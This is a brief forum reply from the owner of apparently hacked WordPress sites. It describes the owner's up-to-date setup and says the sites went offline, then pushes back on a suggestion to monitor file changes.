I will need to find out how they got the hack in. As mentioned the system is entirely up to date and the WP blog is set to auto update (v 3.9.1 now).

I am not claiming anything. I am reporting.

Thank you for underlining the monitoring of files thing....if you read my opening post you'd have noticed that the sites were taken offline by the hack thus it was rather hard not to notice the file modification.

V.